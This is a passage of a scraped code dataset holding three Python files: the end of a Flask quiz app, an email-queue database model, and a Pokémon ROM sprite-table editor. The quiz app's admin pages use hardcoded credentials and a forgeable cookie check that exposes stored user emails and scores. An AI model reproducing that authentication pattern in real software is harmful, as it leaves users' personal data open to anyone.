\"\n x=question[0]\n question.pop(0)\n option=request.args.get(\"option\")\n try:\n option=int(option)\n except:\n option=0\n if x[\"answer\"]==int(option):\n session['marks']+=1\n #print(session['marks'])\n try:\n return render_template(\"question.html\", q=question[0],que=5-len(question)+1)\n except:\n return redirect('/sub',code=302)\n@app.route('/submit',methods=[\"GET\",\"POST\"])\ndef subsubmit():\n question = session[\"questionsa\"]\n session['complete']=True\n try:\n x=question[0]\n except:\n return \"
ACCESS DENIED
\"\n x=question[0]\n question.pop(0)\n option=request.args.get(\"option\")\n try:\n option=int(option)\n except:\n option=0\n if x[\"answer\"]==int(option):\n session['marks']+=1\n #print(session['marks'])\n return redirect('/sub',code=302)\n@app.route('/sub',methods=[\"GET\",\"POST\"])\ndef submit():\n try:\n if session[\"email\"]==\"\":\n return redirect('login',code=302)\n usr1=User()\n usr1.username=session['name']\n usr1.email_address=session['email']\n usr1.marks=session['marks']\n usr1.date=str(datetime.datetime.now())[:18]\n db.session.add(usr1)\n db.session.commit()\n return render_template(\"score.html\",name=session[\"name\"],total=session['marks'])\n except:\n return redirect('/',code=302)\n@app.route('/admin')\ndef adminlog():\n x = Admin_log.query.all()\n fl = 0\n if (request.cookies.get('ip') == \"bar\") :\n fl = 1\n \n if fl:\n return redirect('/admin_check',code=302)\n return render_template(\"adminlogin.html\")\n@app.route('/admin_check',methods=[\"GET\",\"POST\"])\ndef admincheck():\n user = request.form.get(\"username\")\n pswd = request.form.get(\"pswd\")\n \n fl=0\n\n if (request.cookies.get('ip') == \"bar\") :\n fl = 1\n if (user == \"walkover\" and pswd == \"walkover\") or fl:\n session[\"access\"] = 1;\n user = User.query.all()\n user.sort(key=lambda x: x.date, reverse=True)\n mn = []\n for i in user:\n d = {}\n d['username'] = i.username\n d['email_address'] = i.email_address\n d['marks'] = i.marks\n d['date'] = i.date\n mn.append(d)\n # print(len(mn),user)\n session['user'] = mn\n session['pages'] = 1\n session['total'] = -(-len(mn) // 5)\n if fl==0:\n use_ip=Admin_log()\n use_ip.ip=request.environ['REMOTE_ADDR']\n db.session.add(use_ip)\n db.session.commit()\n res = make_response(redirect('/admin-surprise', code=302))\n res.set_cookie('ip', 'bar', expires=datetime.datetime.now() + datetime.timedelta(days=2))\n return res\n #session['ip'].append(request.environ['REMOTE_ADDR'])\n #print(session['ip'])\n return \"
Access Denied
\"\n\n@app.route('/admin-surprise',methods=[\"GET\",\"POST\"])\ndef admin():\n #print(request.environ['REMOTE_ADDR'], 'a')\n mn = request.environ['REMOTE_ADDR']\n #print(mn, session['ip'])\n \n fl = 0\n if (request.cookies.get('ip') == \"bar\") :\n fl = 1\n if (fl):\n session['access'] = 1\n else:\n session['access']=0\n if session[\"access\"] != 1:\n return \"
Access Denied
\"\n user = session['user']\n page = session['pages']\n option = request.args.get(\"option\")\n try:\n option = int(option)\n except:\n option = 0\n if (option == 1):\n page += 1\n elif (option == 2):\n page -= 1\n session['pages'] = page\n # print(page)\n flag = 1\n flag1 = 1\n if (page == 1):\n flag1 = 0\n if (page == session['total']):\n flag = 0\n # print(user)\n return render_template(\"admin.html\", user=user[5 * (page - 1):5 * page], flag=flag, flag1=flag1, page=1)\nif __name__==\"__main__\":\n app.run(debug=False)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"595539052","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport transaction\n\nfrom sqlalchemy import (\n Column,\n Integer,\n String,\n DateTime,\n ForeignKey,\n )\n \nfrom sqlalchemy.orm import (\n relationship,\n )\n \nfrom ..db import (\n Base,\n KJBase,\n DBSession,\n )\n\nfrom ..lib.mailer import Mailer\n\n\nclass EmailQueue(Base, KJBase):\n __tablename__ = 'email_queue'\n\n id = Column(Integer, primary_key=True)\n when_sent = Column(DateTime)\n type = Column(String(2))\n email_to = Column(String(200))\n subject = Column(String(500))\n body = Column(String(5000))\n \n us_id = Column(Integer, ForeignKey('users.id'), index=True)\n user = relationship('User')\n \n @classmethod\n def push(cls, type, user, subject, body):\n email = EmailQueue()\n email.us_id = user.id\n email.type = type\n email.email_to = user.email\n email.subject = subject\n email.body = body \n DBSession.add(email)\n DBSession.flush()\n return email\n \n @classmethod\n def get_emails_to_send(cls):\n return DBSession.query(cls).filter(cls.when_sent == None).all()\n \n def send(self):\n from ..models.user import User\n from ..lib.email_sender import EmailSender\n mailer = Mailer()\n mailer.login()\n res = mailer.send(EmailSender.FROM, self.user.email, self.subject, self.body)\n self.mark_sent()\n \n def mark_sent(self):\n self.when_sent = datetime.datetime.now()\n transaction.commit()\n \n \n\n","sub_path":"kj/models/email_queue.py","file_name":"email_queue.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"54572317","text":"import mmap\r\nfrom core_files.rom_api import *\r\n\r\nTemplateList = ['Template1', 'Template2', 'Template3', 'Template4', 'Template5', 'Template6', 'Template7', 'Template8']\r\n\r\nTemplates = []\r\n\r\nframetype1 = [0x0, 0x1] # [16x32]\r\nframetype2 = [0x0, 0x2] # [32x32]\r\nframetype3 = [0x80, 0x0] # [16x16]\r\nframetype4 = [0x0, 0x8] # [64x64]\r\nframetype5 = [0x0, 0x10] # [128x64] FR Only\r\nframetype6 = [0x80, 0x4] # [48x48] Emerald only\r\nframetype7 = [0x80, 0x5] # [88x32] Emerald only\r\nframetype8 = [0x80, 0x7] # [96x40] Emerald only\r\n\r\n# DEFINES\r\nTBL_0 = 0x0\r\nFREE_SPC = 0x0\r\nFRAMES_PER_OW = 15\r\nFRAMES_END = 0x2135F0\r\n\r\n# This will be used to determin number of frames\r\n# When repointing a table. 
Used in ow_initializer, repoint_table\r\nFRAMES_PTRS_PTRS = set()\r\n\r\n# ----------------------Functions------------------------------\r\n\r\ndef change_core_info(ow_tbls_ptrs_tbl, files_path):\r\n global TBL_0, FREE_SPC\r\n TBL_0 = ow_tbls_ptrs_tbl\r\n\r\n import os\r\n if os.path.exists(files_path):\r\n global TemplateList\r\n\r\n for i in range(0, 8):\r\n path = files_path + TemplateList[i]\r\n\r\n temp = open(path, 'r+b')\r\n template = mmap.mmap(temp.fileno(), 0)\r\n Templates.append(template)\r\n\r\ndef update_free_space(size, start_addr=FREE_SPC):\r\n global FREE_SPC\r\n FREE_SPC = find_free_space(size, start_addr, 2)\r\n\r\ndef find_free_space_update(size, start_addr=0, ending=0):\r\n addr = find_free_space(size, start_addr, ending)\r\n # Update the Free Space addr\r\n global FREE_SPC\r\n FREE_SPC = addr + size\r\n return addr\r\n\r\ndef is_ow_data(addr):\r\n # Checks various bytes to see if they are the same with the templates\r\n try:\r\n if read_byte(addr + 0x0) != 0xFF: return 0\r\n if read_byte(addr + 0x1) != 0xFF: return 0\r\n\r\n if not is_ptr(addr + 0x10): return 0\r\n if not is_ptr(addr + 0x14): return 0\r\n if not is_ptr(addr + 0x18): return 0\r\n if not is_ptr(addr + 0x1c): return 0\r\n if not is_ptr(addr + 0x20): return 0\r\n except IndexError:\r\n return 0\r\n return 1\r\n\r\ndef is_orig_table_ptr(addr):\r\n # Check if it is a Vanilla Table 1 (OW Data Pointers)\r\n if not is_ptr(addr): return 0\r\n\r\n ow_data_ptr = ptr_to_addr(addr)\r\n if not is_ptr(ow_data_ptr): return 0\r\n\r\n ow_data = ptr_to_addr(ow_data_ptr)\r\n if not is_ow_data(ow_data): return 0\r\n\r\n frames_ptrs = ptr_to_addr(ow_data + 0x1C)\r\n if not is_frames_ptr(frames_ptrs): return 0\r\n return 1\r\n\r\ndef is_owm_table_ptr(addr):\r\n # Check if it is a Vanilla Table 1 (OW Data Pointers)\r\n if not is_ptr(addr): return 0\r\n ow_data_ptr = ptr_to_addr(addr)\r\n end_of_table = ow_data_ptr + 256 * 4\r\n\r\n # Check for OWM's signature\r\n if not is_ptr(end_of_table): return 0\r\n if not is_ptr(end_of_table + 4): return 0\r\n if not is_ptr(end_of_table + 8): return 0\r\n\r\n # Check if the pointers are valid\r\n if read_word(ow_data_ptr) == 0x11111111: return 1\r\n if not is_ow_data_ptr(ow_data_ptr):\r\n return 0\r\n else:\r\n return 1\r\n\r\ndef is_table_ptr(addr):\r\n # Used to check if addr is a ptr to OW Data Pointers Table\r\n return is_orig_table_ptr(addr) or is_owm_table_ptr(addr)\r\n\r\ndef is_jpan_ptr(addr):\r\n # If JPAN's patch was applied, then there should be a pointer in a\r\n # routine somewhere that points to the new Table 0 (0x1A2000 default addr)\r\n if not is_ptr(addr): return 0\r\n maybe_tbl = ptr_to_addr(addr)\r\n if not is_table_ptr(maybe_tbl): return 0\r\n\r\n # Finally in Table 0 it should either have pointers to Table 1 or 0x00\r\n if read_word(maybe_tbl + 4) == 0x0: return 1\r\n if is_table_ptr(maybe_tbl + 4): return 1\r\n return 0\r\n\r\ndef is_ow_data_ptr(addr):\r\n return is_ptr(addr) and is_ow_data(ptr_to_addr(addr))\r\n\r\ndef is_frames_end(addr):\r\n global FRAMES_END\r\n\r\n if ptr_to_addr(addr) == FRAMES_END:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef sublist(pattern, mylist):\r\n matches = []\r\n for i in range(len(mylist)):\r\n if mylist[i] == pattern[0] and mylist[i:i+len(pattern)] == pattern:\r\n return 1\r\n return 0\r\n\r\ndef table_needs_repoint(addr):\r\n ow_ptr = ptr_to_addr(addr)\r\n end_of_table = ow_ptr + 256 * 4\r\n\r\n if read_word(ptr_to_addr(end_of_table)) == 0x22222222:\r\n return 0\r\n\r\n if not is_ow_data(ptr_to_addr(end_of_table)):\r\n return 
1\r\n\r\n if not is_ptr(end_of_table + 4):\r\n return 1\r\n\r\n if read_word(ptr_to_addr(end_of_table + 4)) == 0x33333333:\r\n return 0\r\n\r\n if not is_frames_ptr(ptr_to_addr(end_of_table + 4)):\r\n return 1\r\n\r\n return 0\r\n\r\ndef update_frames_addr(num, addr, ow_type):\r\n for i in range(1, num + 1):\r\n addr += get_frame_size(ow_type)\r\n return addr\r\n\r\ndef get_frame_size(ow_type):\r\n if ow_type == 1:\r\n return 256 # 0x100\r\n if ow_type == 2:\r\n return 512 # 0x200\r\n if ow_type == 3:\r\n return 128 # 0x80\r\n if ow_type == 4:\r\n return 2048 # 0x800\r\n if ow_type == 5:\r\n return 4096 # 0x1000\r\n if ow_type == 6:\r\n return 1152 # 0x480\r\n if ow_type == 7:\r\n return 1408 # 0x580\r\n if ow_type == 8:\r\n return 1920 # 0x780\r\n\r\ndef clear_frames(addr, frames, size):\r\n # first check if FRAMES_END is inside the data (overlay: happens with 0xFFs)\r\n if sublist([0xF0, 0x35, 0x21, 0x08], read_bytes(addr, frames*size)):\r\n write_word(addr + frames*size, 0xFFFFFFFF)\r\n print(\"WARNING: Found a colision\")\r\n return\r\n\r\n fill_with_data(addr, frames * size, 0xFF)\r\n print(HEX(addr))\r\n write_word(addr, 0xFFFFFFFF)\r\n\r\ndef available_frames_ptr_addr(addr, num_of_frames):\r\n rom.seek(addr)\r\n\r\n for i in range(1, (num_of_frames * 8) + 1):\r\n if rom.read_byte() != 0x33:\r\n return 0\r\n return 1\r\n\r\ndef write_frames_end(addr):\r\n global FRAMES_END\r\n write_ptr(FRAMES_END, addr)\r\n\r\ndef get_frame_dimensions(ow_type):\r\n if ow_type == 1:\r\n width = 16\r\n height = 32\r\n elif ow_type == 2:\r\n width = 32\r\n height = 32\r\n elif ow_type == 3:\r\n width = 16\r\n height = 16\r\n elif ow_type == 4:\r\n width = 64\r\n height = 64\r\n elif ow_type == 5:\r\n width = 128\r\n height = 64\r\n elif ow_type == 6:\r\n width = 48\r\n height = 48\r\n elif ow_type == 7:\r\n width = 88\r\n height = 32\r\n elif ow_type == 8:\r\n width = 96\r\n height = 40\r\n\r\n return width, height\r\n\r\ndef get_template(ow_type):\r\n return Templates[ow_type - 1]\r\n\r\ndef get_ow_palette_id(addr):\r\n rom.seek(addr + 2)\r\n byte1 = rom.read_byte()\r\n byte2 = rom.read_byte()\r\n\r\n return (byte2 * 256) + byte1\r\n\r\ndef addrs_filter(new_table, ow_data_addr, frames_ptrs, frames_addr):\r\n # 0xA000 is ~ 256 * (4 + 36 + FRAMES_PER_OW * 8)\r\n if new_table == 0:\r\n new_table = find_free_space_update((260 * 4), FREE_SPC, 4) # 3 more for the table's info + 1 for rounding\r\n else:\r\n new_table = find_free_space((260 * 4), new_table, 4)\r\n\r\n if ow_data_addr == 0:\r\n ow_data_addr = find_free_space_update((256 * 36) + 4, new_table + 259 * 4, 4)\r\n else:\r\n ow_data_addr = find_free_space((256 * 36) + 4, ow_data_addr, 4)\r\n\r\n if frames_ptrs == 0:\r\n frames_ptrs = find_free_space_update((9 * 8 * 256) + 4, ow_data_addr + (256 * 36) + 4, 4)\r\n else:\r\n frames_ptrs = find_free_space((9 * 8 * 256) + 4, frames_addr, 4)\r\n\r\n if frames_addr == 0:\r\n frames_addr = find_free_space_update(0x40000, frames_ptrs + (9 * 8 * 256) + 4, 2)\r\n else:\r\n frames_addr = find_free_space(0x40000, frames_addr, 2)\r\n\r\n print(\"Found Addresses: {} {} {} {}\".format(HEX(new_table),HEX(ow_data_addr),HEX(frames_ptrs),HEX(frames_addr)))\r\n return new_table, ow_data_addr, frames_ptrs, frames_addr\r\n\r\ndef write_ow_palette_id(addr, palette_id):\r\n rom.seek(addr + 2)\r\n byte1 = int(palette_id / 256)\r\n byte2 = int(palette_id % 256)\r\n\r\n rom.write_byte(byte2)\r\n rom.write_byte(byte1)\r\n rom.flush()\r\n\r\ndef is_frames_ptr(addr):\r\n check1 = is_ptr(addr)\r\n\r\n # It checks first the type of 
the frames from the data next to the ptr\r\n frame = []\r\n\r\n rom.seek(addr + 4)\r\n frame = [rom.read_byte(), rom.read_byte()]\r\n\r\n if frame == frametype1:\r\n tp = 1\r\n elif frame == frametype2:\r\n tp = 2\r\n elif frame == frametype3:\r\n tp = 3\r\n elif frame == frametype4:\r\n tp = 4\r\n elif frame == frametype5:\r\n tp = 5\r\n elif frame == frametype6:\r\n tp = 6\r\n elif frame == frametype7:\r\n tp = 7\r\n elif frame == frametype8:\r\n tp = 8\r\n else:\r\n tp = 0\r\n\r\n if tp != 0:\r\n tp = 1\r\n return tp * check1\r\n\r\ndef get_palette_slot(data_addr):\r\n rom.seek(data_addr + 12)\r\n slot_compressed = rom.read_byte()\r\n\r\n return int(slot_compressed % 16)\r\n\r\ndef write_palette_slot(data_addr, palette_slot):\r\n rom.seek(data_addr + 12)\r\n byte = rom.read_byte()\r\n\r\n byte1 = int(byte / 16)\r\n slot = (byte1 * 16) + palette_slot\r\n rom.seek(data_addr + 12)\r\n rom.write_byte(slot)\r\n rom.flush()\r\n\r\ndef get_animation_addr(ow_data_addr):\r\n data_tuple = [0, 0]\r\n data_tuple[0] = ptr_to_addr(ow_data_addr + 0x18)\r\n data_tuple[1] = ptr_to_addr(ow_data_addr + 0x20)\r\n return data_tuple\r\n\r\ndef write_animation_ptr(ow_data_addr, data_tuple):\r\n write_ptr(data_tuple[0], ow_data_addr + 0x18)\r\n write_ptr(data_tuple[1], ow_data_addr + 0x20)\r\n\r\ndef get_text_color(ow_data_addr):\r\n return read_byte(ow_data_addr + 0xE)\r\n\r\ndef set_text_color(ow_data_addr, val):\r\n write_byte(ow_data_addr + 0xE, val)\r\n\r\ndef get_footprint(ow_data_addr):\r\n return read_byte(ow_data_addr + 13)\r\n\r\ndef set_footprint(ow_data_addr, val):\r\n write_byte(ow_data_addr + 13, val)\r\n\r\n# -----------------Classes--------------------\r\n\r\nclass FramesPointers:\r\n frames_ptrs_addr = 0x0\r\n frames_addr = 0x0\r\n frames_ptrs_addr_start = 0x0\r\n frames_addr_start = 0x0\r\n\r\n def __init__(self, frames_ptrs_addr=0x0, frames_addr=0x0, frames_ptrs_addr_start=0,\r\n frames_addr_start=0):\r\n self.frames_ptrs_addr = frames_ptrs_addr\r\n self.frames_addr = frames_addr\r\n self.frames_ptrs_addr_start = frames_ptrs_addr_start\r\n self.frames_addr_start = frames_addr_start\r\n\r\n def add_frames_ptrs(self, ow_type, num_of_frames):\r\n\r\n frames_addr = self.find_frames_free_space(ow_type, num_of_frames)\r\n frames_ptrs_addr = self.find_available_frames_ptrs_addr(num_of_frames)\r\n # Write changes to the class' variables\r\n self.frames_ptrs_addr = frames_ptrs_addr\r\n self.frames_addr = frames_addr\r\n\r\n # Initialize the actual data of the frames\r\n fill_with_data(frames_addr, num_of_frames * get_frame_size(ow_type), -1)\r\n # Write the frame_end prefix\r\n write_ptr(FRAMES_END, frames_addr + num_of_frames * get_frame_size(ow_type))\r\n\r\n self.write_frames_ptrs(ow_type, num_of_frames)\r\n\r\n def find_frames_free_space(self, ow_type, frames_num, addr=0):\r\n\r\n working_addr = self.frames_addr_start\r\n if addr != 0:\r\n working_addr = addr\r\n\r\n frame_size = get_frame_size(ow_type)\r\n size = frame_size * frames_num\r\n # working_addr = find_free_space(size + 4, working_addr, 2)\r\n working_addr = find_free_space(size + 4, working_addr, 2)\r\n\r\n return working_addr\r\n\r\n def find_available_frames_ptrs_addr(self, frames_num):\r\n working_addr = self.frames_ptrs_addr_start\r\n\r\n while 1:\r\n if available_frames_ptr_addr(working_addr, frames_num) == 1:\r\n return working_addr\r\n else:\r\n working_addr += 8\r\n\r\n def write_frames_ptrs(self, ow_type, frames_num):\r\n\r\n frame_ptr_addr = self.frames_ptrs_addr\r\n frame_addr = self.frames_addr\r\n\r\n frametype = []\r\n 
if ow_type == 1:\r\n frametype = frametype1\r\n elif ow_type == 2:\r\n frametype = frametype2\r\n elif ow_type == 3:\r\n frametype = frametype3\r\n elif ow_type == 4:\r\n frametype = frametype4\r\n elif ow_type == 5:\r\n frametype = frametype5\r\n elif ow_type == 6:\r\n frametype = frametype6\r\n elif ow_type == 7:\r\n frametype = frametype7\r\n elif ow_type == 8:\r\n frametype = frametype8\r\n\r\n # Write the frames Pointers\r\n for i in range(0, frames_num):\r\n write_ptr(frame_addr, frame_ptr_addr)\r\n write_bytes(frame_ptr_addr + 4, frametype + [0x0, 0x0])\r\n\r\n frame_ptr_addr += 8\r\n frame_addr += get_frame_size(ow_type)\r\n\r\n def repoint_frames(self, new_frames_addr):\r\n\r\n frames_num = self.get_num()\r\n ow_type = self.get_type()\r\n\r\n new_addr = self.find_frames_free_space(ow_type, frames_num, new_frames_addr)\r\n\r\n def get_type(self):\r\n # It checks first the type of the frames from the data next to the ptr\r\n frame = []\r\n\r\n rom.seek(self.frames_ptrs_addr + 4)\r\n frame = [rom.read_byte(), rom.read_byte()]\r\n\r\n tp = -1\r\n if frame == frametype1:\r\n tp = 1\r\n elif frame == frametype2:\r\n tp = 2\r\n elif frame == frametype3:\r\n tp = 3\r\n elif frame == frametype4:\r\n tp = 4\r\n elif frame == frametype5:\r\n tp = 5\r\n elif frame == frametype6:\r\n tp = 6\r\n elif frame == frametype7:\r\n tp = 7\r\n elif frame == frametype8:\r\n tp = 8\r\n\r\n # if tp == -1:\r\n # print(\"get_type: Cant find type for \" + HEX_LST(frame))\r\n # print(HEX_LST(read_bytes(self.frames_ptrs_addr, 8)))\r\n return tp\r\n\r\n def get_num(self):\r\n ow_type = self.get_type()\r\n size = get_frame_size(ow_type)\r\n\r\n # Reads the total number of bytes\r\n addr = self.frames_addr\r\n i = 0\r\n while is_frames_end(addr) != 1:\r\n i += 1\r\n addr += size\r\n\r\n # if (addr == 0xc6921a):\r\n # print(\"HELLOOOOO\")\r\n return i\r\n\r\n def clear(self):\r\n ow_type = self.get_type()\r\n frames_num = self.get_num()\r\n\r\n # Clear the ptrs addr\r\n fill_with_data(self.frames_ptrs_addr, frames_num * 8, 0x33)\r\n # Clear the actual data of the frames, watch out for overlays\r\n clear_frames(self.frames_addr, frames_num, get_frame_size(ow_type))\r\n\r\nclass OWData:\r\n ow_ptr_addr = 0x0\r\n ow_data_addr = 0x0\r\n ow_data_addr_start = 0x0\r\n frames = FramesPointers()\r\n\r\n def __init__(self, ow_data_addr, ptr_addr, ow_data_addr_start):\r\n self.ow_data_addr = ow_data_addr\r\n self.ow_ptr_addr = ptr_addr\r\n self.ow_data_addr_start = ow_data_addr_start\r\n\r\n def add_ow_data(self, ow_type, frames_ptrs_addr):\r\n # Type 1: The hero, Type 2: Hero Bike, Type 3: Lil girl\r\n template = get_template(ow_type)\r\n\r\n ow_data_addr = self.find_available_ow_data_addr()\r\n self.ow_data_addr = ow_data_addr\r\n\r\n rom.seek(ow_data_addr)\r\n template.seek(0)\r\n for i in range(0x24):\r\n rom.write_byte(template.read_byte())\r\n\r\n # Write the ptr to the frames\r\n write_ptr(frames_ptrs_addr, ow_data_addr + 0x1c)\r\n\r\n def find_available_ow_data_addr(self):\r\n\r\n working_addr = self.ow_data_addr_start\r\n\r\n while 1:\r\n if is_ow_data(working_addr) == 0:\r\n return working_addr\r\n else:\r\n working_addr += 0x24\r\n\r\n def clear(self):\r\n self.frames.clear()\r\n fill_with_data(self.ow_data_addr, 36, 0x22) # 0x22 = 34\r\n\r\n def remove(self):\r\n # Clear itself\r\n self.clear()\r\n # Clear the ow_ptr\r\n fill_with_data(self.ow_ptr_addr, 4, 0x22) # 0x22\r\n\r\n def move_left(self):\r\n # Move the OW Data left\r\n move_data(self.ow_data_addr, self.ow_data_addr - 36, 36, 0x22) # 0x22\r\n # Change 
the ow_ptr to point to the new addr\r\n write_ptr(self.ow_data_addr - 36, self.ow_ptr_addr)\r\n # Move the OW Pointer left\r\n move_data(self.ow_ptr_addr, self.ow_ptr_addr - 4, 4, 0x22) # 0x22\r\n\r\n def move_right(self):\r\n\r\n # Move the OW Data right\r\n move_data(self.ow_data_addr, self.ow_data_addr + 36, 36, 0x22) # 0x22\r\n\r\n # Change the ow_ptr to point to the new addr\r\n write_ptr(self.ow_data_addr + 36, self.ow_ptr_addr)\r\n\r\n # Move the OW Pointer right\r\n move_data(self.ow_ptr_addr, self.ow_ptr_addr + 4, 4, 0x22) # 0x22\r\n\r\nclass OWPointerTable:\r\n table_ptr_addr = 0\r\n table_addr = 0x0\r\n ow_data_ptrs = []\r\n\r\n ow_data_addr = 0x0\r\n frames_ptrs_addr = 0x0\r\n frames_addr = 0x0\r\n end_of_table = 0x0\r\n\r\n def __init__(self, table_ptr_addr, table_addr, ow_data_addr, frames_ptrs, frames_addr):\r\n self.table_ptr_addr = table_ptr_addr\r\n self.table_addr = table_addr\r\n self.ow_data_addr = ow_data_addr\r\n self.frames_ptrs_addr = frames_ptrs\r\n self.frames_addr = frames_addr\r\n self.ow_data_ptrs = []\r\n self.end_of_table = table_addr + (256 * 4)\r\n\r\n # Checks if the table was already there\r\n if ptr_to_addr(self.table_addr) == 0xFFFFFF:\r\n # fill with bytes the OW Data Pointers Table,\r\n # OW Data Table and Frames Pointers Table(~20 frames/ow)\r\n fill_with_data(self.table_addr, 256 * 4, 0x11)\r\n fill_with_data(self.ow_data_addr, 256 * 36, 0x22)\r\n fill_with_data(self.frames_ptrs_addr, 256 * 8 * FRAMES_PER_OW, 0x33)\r\n\r\n # Write the table's info\r\n print(\"\\ntbl_init: OW Pointers(WR): \"+HEX(self.table_addr))\r\n print(\"tbl_init: OW Data(WR): \"+HEX(self.ow_data_addr))\r\n print(\"tbl_init: Frames Pointers(WR): \"+HEX(self.frames_ptrs_addr))\r\n print(\"tbl_init: Frames Address(WR): \"+HEX(self.frames_addr))\r\n write_ptr(self.ow_data_addr, self.end_of_table)\r\n write_ptr(self.frames_ptrs_addr, self.end_of_table + 4)\r\n write_ptr(self.frames_addr, self.end_of_table + 8)\r\n\r\n check_addr = self.table_addr\r\n while is_ptr(check_addr) and check_addr != self.end_of_table:\r\n # There is an OW ptr\r\n self.ow_data_ptrs.append(self.ow_initializer(check_addr))\r\n check_addr += 4\r\n\r\n def ow_initializer(self, ow_ptr):\r\n ow_data_addr = ptr_to_addr(ow_ptr)\r\n frames_ptrs_addr = ptr_to_addr(ow_data_addr + 0x1C)\r\n frames_addr = ptr_to_addr(frames_ptrs_addr)\r\n FRAMES_PTRS_PTRS.add(frames_ptrs_addr)\r\n\r\n # Create the Frames OBJ\r\n FramesOBJ = FramesPointers(frames_ptrs_addr, frames_addr,\r\n self.frames_ptrs_addr, self.frames_addr)\r\n\r\n # Create the OW Data OBJ\r\n OWDataOBJ = OWData(ow_data_addr, ow_ptr, self.ow_data_addr)\r\n OWDataOBJ.frames = FramesOBJ\r\n\r\n return OWDataOBJ\r\n\r\n def find_available_ow_ptr(self):\r\n working_addr = self.table_addr\r\n\r\n while 1:\r\n if is_ptr(working_addr) == 0:\r\n return working_addr\r\n else:\r\n working_addr += 4\r\n\r\n def re_initialize_ow(self):\r\n # Re-initialize the ow_ptrs\r\n self.ow_data_ptrs = []\r\n\r\n check_addr = self.table_addr\r\n while 1:\r\n if is_ptr(check_addr) == 1:\r\n # Checks if its the end of the table\r\n if check_addr == self.end_of_table:\r\n break\r\n # There is an OW ptr\r\n self.ow_data_ptrs.append(self.ow_initializer(check_addr))\r\n check_addr += 4\r\n else:\r\n break\r\n\r\n def add_ow(self, ow_type, num_of_frames):\r\n\r\n # First create the frames\r\n FramesOBJ = FramesPointers(0, 0, self.frames_ptrs_addr, self.frames_addr)\r\n FramesOBJ.add_frames_ptrs(ow_type, num_of_frames)\r\n\r\n # Create OW Data\r\n ow_ptr = self.find_available_ow_ptr()\r\n\r\n 
OWDataOBJ = OWData(0, ow_ptr, self.ow_data_addr)\r\n OWDataOBJ.add_ow_data(ow_type, FramesOBJ.frames_ptrs_addr)\r\n OWDataOBJ.frames = FramesOBJ\r\n\r\n # Write the OW Pointer in the Table\r\n write_ptr(OWDataOBJ.ow_data_addr, ow_ptr)\r\n\r\n # Re-initialise the ow ptrs\r\n self.re_initialize_ow()\r\n\r\n write_palette_slot(self.ow_data_ptrs[-1].ow_data_addr, 0xA)\r\n\r\n def remove_ow(self, ow_id):\r\n length = len(self.ow_data_ptrs)\r\n\r\n # Removes the data of the OW and changes all the ptrs\r\n self.ow_data_ptrs[ow_id].remove()\r\n\r\n for i in range(ow_id, length):\r\n # Without that if statement it would try to move_left the ow_data_ptrs[length]\r\n if i != length - 1:\r\n self.ow_data_ptrs[i + 1].move_left()\r\n\r\n # Re-initialize the ow_ptrs\r\n self.re_initialize_ow()\r\n\r\n def insert_ow(self, pos, ow_type, num_of_frames):\r\n # Get number of OWs\r\n l = len(self.ow_data_ptrs)\r\n\r\n # Move the data and the ptrs of all the OWs to the right\r\n for i in range(l - 1, pos - 1, -1):\r\n self.ow_data_ptrs[i].move_right()\r\n\r\n # Insert the new OW\r\n self.add_ow(ow_type, num_of_frames)\r\n\r\n # Re-initialize the ow_ptrs\r\n self.re_initialize_ow()\r\n\r\n def resize_ow(self, pos, ow_type, num_of_frames):\r\n # Get info\r\n ow_data_addr = self.ow_data_ptrs[pos].ow_data_addr\r\n animation_ptr = get_animation_addr(ow_data_addr)\r\n palette_slot = get_palette_slot(ow_data_addr)\r\n footprint_byte = read_byte(ow_data_addr + 13)\r\n\r\n self.ow_data_ptrs[pos].remove()\r\n self.add_ow(ow_type, num_of_frames)\r\n\r\n # Restore Info\r\n write_animation_ptr(ow_data_addr, animation_ptr)\r\n write_palette_slot(ow_data_addr, palette_slot)\r\n write_byte(ow_data_addr + 13, footprint_byte)\r\n\r\n # Re-initialise the ow ptrs\r\n self.re_initialize_ow()\r\n\r\nclass Root:\r\n ow_tables_addr = 0x0 # Talbe 0\r\n ow_tables_addrs = [] # [ptr:Table 2] or Table 1's entries\r\n tables_list = []\r\n\r\n def __init__(self):\r\n # Don't initialize in case a rom is not loaded\r\n if rom.rom_contents is None:\r\n return\r\n\r\n self.tables_list = []\r\n self.ow_tables_addr = TBL_0\r\n FRAMES_PTRS_PTRS = set()\r\n\r\n # Get addresses of OW Data Pointers Tables (Table 1)\r\n addr = self.ow_tables_addr\r\n ow_tbls_addrs = [] #[ptr:Table 1] or Table 0's entries\r\n while is_table_ptr(addr):\r\n if ptr_to_addr(addr) in [0x39FFB0, 0x39FEB0]:\r\n fill_with_data(addr, 4, 0)\r\n continue\r\n ow_tbls_addrs.append(addr)\r\n self.ow_tables_addrs.append(ptr_to_addr(addr))\r\n addr += 4\r\n\r\n for addr in ow_tbls_addrs:\r\n print(\"\\nroot: About to check: {} ({})\".format(HEX(addr), HEX(ptr_to_addr(addr))))\r\n if table_needs_repoint(addr):\r\n # If it was the first table, change any pointer in the\r\n # ROM that might be pointing to it\r\n if addr == self.ow_tables_addr:\r\n SHOW(\"Searching for Pointers for the Default OW Table\")\r\n ptrs = find_ptr_in_rom(ptr_to_addr(addr), True)\r\n self.repoint_table(addr)\r\n for ptr in ptrs:\r\n write_ptr(ptr_to_addr(addr), ptr)\r\n else:\r\n self.repoint_table(addr)\r\n else:\r\n table_ptr_addr = addr\r\n table_addr = ptr_to_addr(addr)\r\n end_of_table = table_addr + (256 * 4)\r\n ow_data_addr = ptr_to_addr(end_of_table)\r\n frames_ptrs = ptr_to_addr(end_of_table + 4)\r\n frames_addr = ptr_to_addr(end_of_table + 8)\r\n SHOW(\"Loading Table (\"+HEX(table_addr)+\")\")\r\n print(\"root: Tables Table: \"+HEX(table_ptr_addr))\r\n print(\"root: Table: \" + HEX(ptr_to_addr(self.ow_tables_addr)))\r\n print(\"root: OW Data: \"+HEX(ow_data_addr))\r\n print(\"root: Frames Pointers: 
